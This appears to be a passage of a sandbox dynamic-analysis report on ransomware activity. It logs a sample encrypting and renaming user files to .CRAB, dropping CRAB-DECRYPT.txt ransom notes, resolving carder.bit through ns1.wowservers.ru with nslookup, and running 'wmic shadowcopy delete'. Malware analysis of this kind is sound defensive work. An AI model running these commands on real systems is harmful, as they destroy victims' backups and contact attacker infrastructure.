File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 1048576, size_out = 126976 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 126976 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Access\System.mdw.CRAB, size = 8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 1048576, size_out = 333602 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 333616 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\APASixthEditionOfficeOnline.xsl.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 1048576, size_out = 297017 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 297024 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\CHICAGO.XSL.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 1048576, size_out = 268670 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 268672 True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 256 True 2
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GB.XSL.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, type = file_attributes True 1
Fn
File Move source_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Bibliography\Style\GostName.XSL.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
For performance reasons, the remaining 4998 entries are omitted.
The remaining entries can be found in glog.xml.
Process #4: nslookup.exe
Information Value
ID #4
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:42, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:04:38
OS Process Information
Information Value
PID 0xb04
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0xB08
0xB1C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000effff Private Memory Readable, Writable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x00100000 0x00104fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
locale.nls 0x002c0000 0x00326fff Memory Mapped File Readable False False False -
pagefile_0x0000000000330000 0x00330000 0x004b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000510000 0x00510000 0x00690fff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0079ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x007a0000 0x00a6efff Memory Mapped File Readable False False False -
private_0x0000000000a70000 0x00a70000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x0000000000ab0000 0x00ab0000 0x00aeffff Private Memory Readable, Writable True False False -
private_0x0000000000b20000 0x00b20000 0x00b5ffff Private Memory Readable, Writable True False False -
private_0x0000000000b70000 0x00b70000 0x00b7ffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00bc0000 0x00bddfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000be0000 0x00be0000 0x01fdffff Pagefile Backed Memory Readable True False False -
private_0x0000000001fe0000 0x01fe0000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000001fe0000 0x01fe0000 0x020fffff Private Memory Readable, Writable True False False -
private_0x0000000002180000 0x02180000 0x0218ffff Private Memory Readable, Writable True False False -
private_0x0000000002190000 0x02190000 0x0228ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x743e0000 0x743e6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74600000 0x74637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74640000 0x74645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74650000 0x74654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74660000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74670000 0x746abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746b0000 0x746c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x746d0000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb08
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:51:44 (UTC) True 1
Fn
System Get Time type = Ticks, time = 103849 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xbc0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = YKyd69q True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #5: nslookup.exe
10 18
Information Value
ID #5
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:57
OS Process Information
Information Value
PID 0xbc4
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs 0xBC8, 0xBF0
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004e0000 0x004e0000 0x00667fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000670000 0x00670000 0x007f0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000800000 0x00800000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x00000000008c0000 0x008c0000 0x008fffff Private Memory Readable, Writable True False False -
private_0x0000000000910000 0x00910000 0x0091ffff Private Memory Readable, Writable True False False -
private_0x0000000000930000 0x00930000 0x0096ffff Private Memory Readable, Writable True False False -
private_0x0000000000970000 0x00970000 0x00adffff Private Memory Readable, Writable True False False -
private_0x0000000000970000 0x00970000 0x00a6ffff Private Memory Readable, Writable True False False -
private_0x0000000000aa0000 0x00aa0000 0x00adffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00b10000 0x00b2dfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000b30000 0x00b30000 0x01f2ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f30000 0x021fefff Memory Mapped File Readable False False False -
wsock32.dll 0x743e0000 0x743e6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74600000 0x74637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x74640000 0x74645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x74650000 0x74654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x74660000 0x74667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x74670000 0x746abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x746b0000 0x746c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x746d0000 0x746dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x746e0000 0x746e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x746f0000 0x746fffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xbc8
10 18
Category Operation Information Success Count
System Get Time type = System Time, time = 2018-06-04 08:52:25 (UTC) True 1
System Get Time type = Ticks, time = 145314 True 1
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xb10000 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Close type = SOCK_DGRAM True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
DNS Get Hostname name_out = YKyd69q True 1
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Socket Close type = SOCK_DGRAM True 1
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Socket Close type = SOCK_DGRAM True 1
Process #6: wmic.exe
21 0
Information Value
ID #6
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:29, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:51
OS Process Information
Information Value
PID 0x894
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
